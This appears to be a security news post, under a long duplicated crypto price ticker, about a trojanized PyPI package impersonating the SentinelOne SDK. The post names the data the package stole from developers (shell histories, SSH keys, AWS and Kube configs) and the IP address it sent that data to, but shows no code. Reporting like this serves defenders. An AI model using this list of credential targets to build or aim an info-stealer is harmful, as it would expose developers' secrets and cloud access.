BTC $68279.0927
ETH $3629.5433
BNB $418.8260
SOL $133.0943
XRP $0.6497
stETH $3620.7348
ADA $0.7707
DOGE $0.1827
AVAX $43.0376
DOT $9.8988
wstETH $4204.4051
TRX $0.1402
LINK $20.4333
WETH $3627.8562
MATIC $1.1461
WBTC $68015.7231
UNI $12.3628
BCH $469.5171
LTC $88.8112
IMX $3.1360
ICP $13.3800
CAKE $3.3523
ETC $35.9657
FIL $10.0244
LEO $4.8744
ATOM $12.4782
TON $2.7811
HBAR $0.1174
RNDR $7.3750
KAS $0.1614
INJ $40.6866
DAI $0.9990
OKB $56.8390
VET $0.0495
PEPE $0.0000
XLM $0.1458
FDUSD $0.9965
STX $3.0333
XMR $148.4317
WEMIX $2.7041
LDO $3.2821
NEAR $4.3354
GRT $0.3080
ARB $1.9787
THETA $2.3471
APEX $2.6824
BSV $115.5449
BTC $68279.0927
ETH $3629.5433
BNB $418.8260
SOL $133.0943
XRP $0.6497
stETH $3620.7348
ADA $0.7707
DOGE $0.1827
AVAX $43.0376
DOT $9.8988
wstETH $4204.4051
TRX $0.1402
LINK $20.4333
WETH $3627.8562
MATIC $1.1461
WBTC $68015.7231
UNI $12.3628
BCH $469.5171
LTC $88.8112
IMX $3.1360
ICP $13.3800
CAKE $3.3523
ETC $35.9657
FIL $10.0244
LEO $4.8744
ATOM $12.4782
TON $2.7811
HBAR $0.1174
RNDR $7.3750
KAS $0.1614
INJ $40.6866
DAI $0.9990
OKB $56.8390
VET $0.0495
PEPE $0.0000
XLM $0.1458
FDUSD $0.9965
STX $3.0333
XMR $148.4317
WEMIX $2.7041
LDO $3.2821
NEAR $4.3354
GRT $0.3080
ARB $1.9787
THETA $2.3471
APEX $2.6824
BSV $115.5449
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • SentinelOne collects sensitive developer data


    The attackers published on PyPI a malicious Python package called SentinelOne, which pretends to be a legitimate SDK client for the American information security company SentinelOne, but in fact steals data from developers.

    The package provides the expected functionality that makes it easy to access the SentinelOne API from another project. However, this package has been trojanized to steal sensitive data from compromised developer systems.

    The attack was discovered by ReversingLabs researchers who reported on the SentinelOne package and PyPI. At the moment, the malicious package has already been removed. The SentinelOne malware package was first uploaded to PyPI on December 11, 2022 and has since been updated 20 times.

    According to the researchers, the package is a copy of the real SentinelOne SDK client, and the attacker updated it to improve and add malicious functionality.

    The fake SentinelOne package contains "api.py" files with malicious code that steals and uploads data to an IP address (54.254.189.27) that does not belong to the SentinelOne infrastructure.

    This malicious code acts as malware to steal various developer data from all home directories on the device. The following information is collected:

    • Bash and Zsh histories;
    • SSH keys;
    • ".gitconfig" files;
    • host files;
    • AWS configuration information;
    • Kube configuration information.

    Because these folders usually contain authentication tokens, sensitive information, and API keys. According to experts, the cybercriminal is deliberately targeting development environments for further access to their cloud services and servers.

    ReversingLabs reports that between December 8 and 11, 2022, the same authors uploaded 5 more packages with the same names. However, these packages did not contain "api.py" files, so they were probably used for testing purposes.

    All published versions of the malicious information stealing malware package have been uploaded over 1000 times on PyPI. From the evidence collected, ReversingLabs researchers were unable to determine if the package was used in actual attacks.

    Author DeepWeb
    Cybercriminals shut down Australian fire service network
    Malware GuLoader uses new methods to bypass security programs

    Comments 0

    Add comment